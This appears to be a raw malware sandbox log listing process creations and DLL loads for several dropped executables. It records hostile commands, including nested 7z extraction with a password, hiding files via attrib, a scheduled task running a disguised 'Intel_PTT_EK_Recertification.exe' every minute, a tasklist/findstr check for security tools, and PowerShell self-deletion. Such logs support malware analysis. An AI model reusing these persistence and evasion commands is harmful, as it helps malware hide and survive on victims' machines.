Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Section loaded: wintypes.dll
